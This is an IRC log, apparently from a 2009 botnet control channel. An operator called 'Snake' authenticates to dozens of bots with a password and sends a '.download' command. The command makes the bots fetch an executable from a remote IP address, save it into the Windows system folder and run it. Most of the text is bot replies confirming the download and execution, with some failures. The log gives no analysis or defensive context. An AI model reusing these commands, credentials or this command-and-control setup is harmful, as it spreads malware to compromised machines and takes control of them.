    [2009-05-26 22:28] *** Joins: n-036448
    [2009-05-26 22:28] *** Joins: n-003745
    [2009-05-26 22:28] *** Joins: n-038736
    [2009-05-26 22:28] *** Joins: n-644986
    [2009-05-26 22:28] *** Joins: n-209874
    [2009-05-26 22:28] *** Joins: n-933488
    [2009-05-26 22:28] *** Joins: n-531390
    [2009-05-26 22:28] *** Joins: n-608854
    [2009-05-26 22:28] *** Joins: n-099717
    [2009-05-26 22:28] *** Joins: n-574783
    [2009-05-26 22:28] *** Joins: n-656401
    [2009-05-26 22:28] *** Joins: n-564682
    [2009-05-26 22:28] *** Joins: n-583027
    [2009-05-26 22:28] *** Joins: n-708766
    [2009-05-26 22:28] *** Joins: n-090483
    [2009-05-26 22:28] *** Joins: n-473636
    [2009-05-26 22:28] *** Joins: n-134198
    [2009-05-26 22:28] *** Joins: n-206544
    [2009-05-26 22:28] *** Joins: n-914449
    [2009-05-26 22:28] *** Joins: n-325084
    [2009-05-26 22:28] *** Joins: n-673312
    [2009-05-26 22:28] *** Joins: n-036476
    [2009-05-26 22:28] *** Joins: n-125949
    [2009-05-26 22:28] *** Joins: n-798534
    [2009-05-26 22:28] *** Joins: n-060080
    [2009-05-26 22:28] *** Joins: n-577176
    [2009-05-26 22:28] *** Joins: n-069330
    [2009-05-26 22:28] *** Joins: n-298615
    [2009-05-26 22:28] *** Joins: n-729889
    [2009-05-26 22:28] *** Joins: n-625681
    [2009-05-26 22:28] *** Joins: n-626412
    [2009-05-26 22:28] *** Joins: n-724312
    [2009-05-26 22:28] *** Joins: n-855098
    [2009-05-26 22:28] *** Joins: n-343371
    [2009-05-26 22:28] *** Joins: n-621628
    [2009-05-26 22:28] *** Joins: n-359209
    [2009-05-26 22:28] *** Joins: n-122510
    [2009-05-26 22:28] *** Joins: n-163349
    [2009-05-26 22:28] *** Joins: n-803614
    [2009-05-26 22:28] *** Joins: n-416676
    [2009-05-26 22:28] *** Joins: n-007036
    [2009-05-26 22:28] *** Joins: n-948576
    [2009-05-26 22:28] *** Joins: n-497181
    [2009-05-26 22:28] *** Joins: n-451594
    [2009-05-26 22:28] *** Joins: n-906008
    [2009-05-26 22:28] *** Joins: n-359859
    [2009-05-26 22:28] *** Joins: n-562456
    [2009-05-26 22:28] *** Joins: n-663781
    [2009-05-26 22:28] *** Joins: n-887717
    [2009-05-26 22:28] *** Joins: n-105384
    [2009-05-26 22:28] *** Joins: n-520755
    [2009-05-26 22:28] *** Joins: n-081379
    [2009-05-26 22:28] *** Joins: n-232275
    [2009-05-26 22:28] *** Joins: n-085369
    [2009-05-26 22:28] *** Joins: n-749060
    [2009-05-26 22:28] *** Joins: n-454604
    [2009-05-26 22:28] *** Joins: n-704388
    [2009-05-26 22:28] *** Joins: n-969379
    [2009-05-26 22:28] *** Joins: n-453107
    [2009-05-26 22:28] *** Joins: n-453828
    [2009-05-26 22:28] *** Joins: n-598900
    [2009-05-26 22:28] *** Joins: n-634355
    [2009-05-26 22:28] *** Joins: n-599247
    [2009-05-26 22:28] *** Joins: n-209372
    [2009-05-26 22:28] *** Joins: n-927673
    [2009-05-26 22:28] *** Joins: n-186739
    [2009-05-26 22:28] *** Joins: n-234644
    [2009-05-26 22:29] *** Joins: n-339428
    [2009-05-26 22:29] *** Joins: Snake
    [2009-05-26 22:29] <my.server.name>
    Snake 81.196.95.22 * :Toxic_Snake
    #privatecanal
    my.server.name :I'm too lazy to edit ircd.conf
    3429 1243345635 :seconds idle, signon time
    End of /WHOIS list.
    [2009-05-26 22:29] <Snake> .download http://81.196.95.22:528/nr.exe c:\windows\mds.exe 1
    [2009-05-26 22:29] <Snake> .login thepartofmindhack
    [2009-05-26 22:29] <n-234644> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-209372> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-105384> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-734028> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-573696> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-497894> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:29] <n-151753> [MAIN]: Password accepted.
    [2009-05-26 22:29] <Snake> .download http://81.196.95.22:528/nr.exe c:\windows\mds.exe 1
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-927673> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-232275> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-060080> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-573696> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-520755> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-121286> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-125949> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] <n-896928> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:29] *** Parts: n-895030
    [2009-05-26 22:29] <n-454604> [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    [2009-05-26 22:29] <n-663781> [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    [2009-05-26 22:29] <n-325084> [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    [2009-05-26 22:30] <n-763665> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 88.2 KB/sec.
    [2009-05-26 22:30] <n-453828> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 73.5 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 73.5 KB/sec.
    [2009-05-26 22:30] <n-599247> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-036448> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 73.5 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 73.5 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-060080> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 55.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 55.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-339428> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-085369> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 63.0 KB/sec.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://81.196.95.22:528/nr.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-626412> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 44.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-186739> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 63.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 44.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-734028> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 44.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 55.1 KB/sec.
    [2009-05-26 22:30] <n-209372> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-611304> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 40.1 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 44.1 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 44.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-642718> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 33.9 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 33.9 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-598900> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    [2009-05-26 22:30] <n-081379> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 29.4 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 36.7 KB/sec.
    [2009-05-26 22:30] <n-073959> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 29.4 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-206544> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 29.4 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 33.9 KB/sec.
    [2009-05-26 22:30] <n-359859> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 31.5 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 25.9 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 25.9 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-684753> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 25.9 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 29.4 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-568861> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 24.5 KB/sec.
    [2009-05-26 22:30] <n-568861> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 27.6 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 27.6 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 23.2 KB/sec.
    [2009-05-26 22:30] <n-927673> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 49.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 23.2 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-121286> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 73.5 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 22.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 25.9 KB/sec.
    [2009-05-26 22:30] <n-658591> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 22.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 23.2 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-914449> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 23.2 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 21.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-656401> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-915282> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 19.2 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-608854> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 18.4 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 23.2 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-122510> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 19.2 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
